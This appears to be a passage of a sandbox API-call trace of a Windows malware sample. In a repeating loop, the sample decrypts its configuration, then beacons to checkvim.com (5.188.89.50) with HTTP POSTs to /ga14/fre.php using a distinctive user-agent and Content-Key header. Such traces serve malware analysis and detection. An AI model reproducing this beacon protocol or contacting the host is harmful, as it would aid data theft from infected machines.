0x840000 [0315.745] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0315.745] GetProcessHeap () returned 0x840000 [0315.745] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0315.745] GetProcessHeap () returned 0x840000 [0315.745] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f8a8 | out: hHeap=0x840000) returned 1 [0315.745] closesocket (s=0x54c) returned 0 [0315.746] GetProcessHeap () returned 0x840000 [0315.746] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b48 | out: hHeap=0x840000) returned 1 [0315.746] GetProcessHeap () returned 0x840000 [0315.746] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0315.746] GetProcessHeap () returned 0x840000 [0315.746] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fab8 | out: hHeap=0x840000) returned 1 [0315.746] GetProcessHeap () returned 0x840000 [0315.746] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871218 | out: hHeap=0x840000) returned 1 [0315.746] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0xc8c) returned 0x54c [0315.748] Sleep (dwMilliseconds=0xea60) [0315.750] GetProcessHeap () returned 0x840000 [0315.750] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb48 [0315.751] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0315.751] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0315.779] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0315.779] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f688) returned 1 [0315.786] GetProcessHeap () returned 0x840000 [0315.786] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0315.787] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0315.787] CryptImportKey (in: hProv=0x86f688, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e630) returned 1 [0315.788] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0315.788] CryptSetKeyParam (hKey=0x87e630, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0315.789] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0315.789] CryptSetKeyParam (hKey=0x87e630, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0315.789] GetProcessHeap () returned 0x840000 [0315.789] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0315.790] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0315.790] CryptDecrypt (in: hKey=0x87e630, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb48, pdwDataLen=0x19f9a4 | out: pbData=0x87fb48, pdwDataLen=0x19f9a4) returned 1 [0315.796] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0315.796] CryptDestroyKey (hKey=0x87e630) returned 1 [0315.797] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0315.797] CryptReleaseContext (hProv=0x86f688, dwFlags=0x0) returned 1 [0315.797] GetProcessHeap () returned 0x840000 [0315.797] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0315.798] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0315.798] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0315.799] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0315.799] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0315.799] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0315.800] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0315.800] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0315.801] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0315.801] GetProcessHeap () returned 0x840000 [0315.801] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871498 [0315.801] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0315.801] GetProcessHeap () returned 0x840000 [0315.801] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871498 | out: hHeap=0x840000) returned 1 [0315.801] GetProcessHeap () returned 0x840000 [0315.801] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0315.801] GetProcessHeap () returned 0x840000 [0315.801] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb48 | out: hHeap=0x840000) returned 1 [0315.801] GetProcessHeap () returned 0x840000 [0315.801] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f710 [0315.802] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0315.802] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0315.807] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0315.807] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fa40) returned 1 [0315.812] GetProcessHeap () returned 0x840000 [0315.812] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0315.813] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0315.813] CryptImportKey (in: hProv=0x86fa40, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e9f0) returned 1 [0315.814] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0315.815] CryptSetKeyParam (hKey=0x87e9f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0315.815] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0315.816] CryptSetKeyParam (hKey=0x87e9f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0315.816] GetProcessHeap () returned 0x840000 [0315.816] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0315.817] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0315.817] CryptDecrypt (in: hKey=0x87e9f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f710, pdwDataLen=0x19f9a4 | out: pbData=0x87f710, pdwDataLen=0x19f9a4) returned 1 [0315.818] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0315.818] CryptDestroyKey (hKey=0x87e9f0) returned 1 [0315.819] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0315.819] CryptReleaseContext (hProv=0x86fa40, dwFlags=0x0) returned 1 [0315.819] GetProcessHeap () returned 0x840000 [0315.819] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0315.820] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0315.820] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0315.820] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0315.821] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0315.821] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0315.822] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0315.822] GetProcessHeap () returned 0x840000 [0315.822] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871240 [0315.822] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871600*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ae8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0315.823] GetProcessHeap () returned 0x840000 [0315.823] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b58 [0315.823] socket (af=2, type=1, protocol=6) returned 0x550 [0315.824] connect (s=0x550, name=0x878ae8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0315.897] FreeAddrInfoW (pAddrInfo=0x871600*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878ae8*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0315.897] GetProcessHeap () returned 0x840000 [0315.897] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86ff90 [0315.897] GetProcessHeap () returned 0x840000 [0315.897] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8865c0 [0315.897] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0315.898] wvsprintfA (in: param_1=0x8865c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0315.898] GetProcessHeap () returned 0x840000 [0315.898] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0315.898] GetProcessHeap () returned 0x840000 [0315.898] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0315.898] GetProcessHeap () returned 0x840000 [0315.898] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f680 [0315.898] GetProcessHeap () returned 0x840000 [0315.898] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8865c0 [0315.899] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0315.899] wvsprintfA (in: param_1=0x8865c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0315.900] GetProcessHeap () returned 0x840000 [0315.900] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0315.900] GetProcessHeap () returned 0x840000 [0315.900] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0315.900] send (s=0x550, buf=0x873a58*, len=237, flags=0) returned 237 [0315.900] send (s=0x550, buf=0x87eb58*, len=159, flags=0) returned 159 [0315.900] GetProcessHeap () returned 0x840000 [0315.900] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0315.900] recv (in: s=0x550, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0316.277] GetProcessHeap () returned 0x840000 [0316.277] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0316.277] GetProcessHeap () returned 0x840000 [0316.277] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0316.277] GetProcessHeap () returned 0x840000 [0316.277] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0316.277] GetProcessHeap () returned 0x840000 [0316.277] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86ff90 | out: hHeap=0x840000) returned 1 [0316.277] closesocket (s=0x550) returned 0 [0316.278] GetProcessHeap () returned 0x840000 [0316.278] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b58 | out: hHeap=0x840000) returned 1 [0316.278] GetProcessHeap () returned 0x840000 [0316.278] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0316.278] GetProcessHeap () returned 0x840000 [0316.278] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0316.278] GetProcessHeap () returned 0x840000 [0316.278] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871240 | out: hHeap=0x840000) returned 1 [0316.278] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x638) returned 0x550 [0316.280] Sleep (dwMilliseconds=0xea60) [0316.281] GetProcessHeap () returned 0x840000 [0316.281] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fdd0 [0316.282] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0316.282] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0316.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0316.288] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fa40) returned 1 [0316.294] GetProcessHeap () returned 0x840000 [0316.294] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0316.294] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0316.295] CryptImportKey (in: hProv=0x86fa40, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e3b0) returned 1 [0316.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0316.296] CryptSetKeyParam (hKey=0x87e3b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0316.296] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0316.297] CryptSetKeyParam (hKey=0x87e3b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0316.297] GetProcessHeap () returned 0x840000 [0316.297] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0316.297] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0316.298] CryptDecrypt (in: hKey=0x87e3b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fdd0, pdwDataLen=0x19f9a4 | out: pbData=0x87fdd0, pdwDataLen=0x19f9a4) returned 1 [0316.298] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0316.299] CryptDestroyKey (hKey=0x87e3b0) returned 1 [0316.299] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0316.299] CryptReleaseContext (hProv=0x86fa40, dwFlags=0x0) returned 1 [0316.299] GetProcessHeap () returned 0x840000 [0316.299] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0316.300] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0316.301] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0316.301] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0316.301] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0316.302] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0316.302] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0316.303] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0316.303] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0316.303] GetProcessHeap () returned 0x840000 [0316.303] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871128 [0316.303] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0316.304] GetProcessHeap () returned 0x840000 [0316.304] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871128 | out: hHeap=0x840000) returned 1 [0316.304] GetProcessHeap () returned 0x840000 [0316.304] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0316.304] GetProcessHeap () returned 0x840000 [0316.304] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fdd0 | out: hHeap=0x840000) returned 1 [0316.304] GetProcessHeap () returned 0x840000 [0316.304] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fb00 [0316.304] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0316.305] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0316.309] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0316.309] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f248) returned 1 [0316.315] GetProcessHeap () returned 0x840000 [0316.315] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0316.315] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0316.316] CryptImportKey (in: hProv=0x86f248, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e7f0) returned 1 [0316.316] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0316.316] CryptSetKeyParam (hKey=0x87e7f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0316.317] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0316.317] CryptSetKeyParam (hKey=0x87e7f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0316.317] GetProcessHeap () returned 0x840000 [0316.317] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0316.318] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0316.318] CryptDecrypt (in: hKey=0x87e7f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fb00, pdwDataLen=0x19f9a4 | out: pbData=0x87fb00, pdwDataLen=0x19f9a4) returned 1 [0316.319] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0316.319] CryptDestroyKey (hKey=0x87e7f0) returned 1 [0316.320] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0316.321] CryptReleaseContext (hProv=0x86f248, dwFlags=0x0) returned 1 [0316.321] GetProcessHeap () returned 0x840000 [0316.321] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x873300 [0316.321] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0316.322] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0316.323] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0316.323] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0316.324] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0316.324] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0316.324] GetProcessHeap () returned 0x840000 [0316.324] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871470 [0316.324] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871178*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0316.326] GetProcessHeap () returned 0x840000 [0316.326] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c78 [0316.326] socket (af=2, type=1, protocol=6) returned 0x554 [0316.326] connect (s=0x554, name=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0316.394] FreeAddrInfoW (pAddrInfo=0x871178*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878a28*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0316.394] GetProcessHeap () returned 0x840000 [0316.394] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f688 [0316.394] GetProcessHeap () returned 0x840000 [0316.395] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8865c0 [0316.395] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0316.396] wvsprintfA (in: param_1=0x8865c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0316.396] GetProcessHeap () returned 0x840000 [0316.396] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x87f4f0 [0316.396] GetProcessHeap () returned 0x840000 [0316.396] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0316.396] GetProcessHeap () returned 0x840000 [0316.396] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f680 [0316.396] GetProcessHeap () returned 0x840000 [0316.396] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8865c0 [0316.397] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0316.398] wvsprintfA (in: param_1=0x8865c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0316.398] GetProcessHeap () returned 0x840000 [0316.398] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0316.398] GetProcessHeap () returned 0x840000 [0316.398] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8865c0 | out: hHeap=0x840000) returned 1 [0316.398] send (s=0x554, buf=0x873a58*, len=237, flags=0) returned 237 [0316.399] send (s=0x554, buf=0x87eb58*, len=159, flags=0) returned 159 [0316.399] GetProcessHeap () returned 0x840000 [0316.399] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8825d8 [0316.399] recv (in: s=0x554, buf=0x8825d8, len=4048, flags=0 | out: buf=0x8825d8*) returned 237 [0316.766] GetProcessHeap () returned 0x840000 [0316.766] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0316.766] GetProcessHeap () returned 0x840000 [0316.766] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f680 | out: hHeap=0x840000) returned 1 [0316.766] GetProcessHeap () returned 0x840000 [0316.766] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f4f0 | out: hHeap=0x840000) returned 1 [0316.766] GetProcessHeap () returned 0x840000 [0316.766] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f688 | out: hHeap=0x840000) returned 1 [0316.766] closesocket (s=0x554) returned 0 [0316.767] GetProcessHeap () returned 0x840000 [0316.767] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871c78 | out: hHeap=0x840000) returned 1 [0316.767] GetProcessHeap () returned 0x840000 [0316.767] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873300 | out: hHeap=0x840000) returned 1 [0316.767] GetProcessHeap () returned 0x840000 [0316.767] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fb00 | out: hHeap=0x840000) returned 1 [0316.767] GetProcessHeap () returned 0x840000 [0316.767] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871470 | out: hHeap=0x840000) returned 1 [0316.767] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8825d8, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x84) returned 0x554 [0316.768] Sleep (dwMilliseconds=0xea60) [0316.770] GetProcessHeap () returned 0x840000 [0316.770] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fea8 [0316.771] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0316.771] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0316.776] LoadLibraryW (lpLibFileName="ADVAPI32") returned 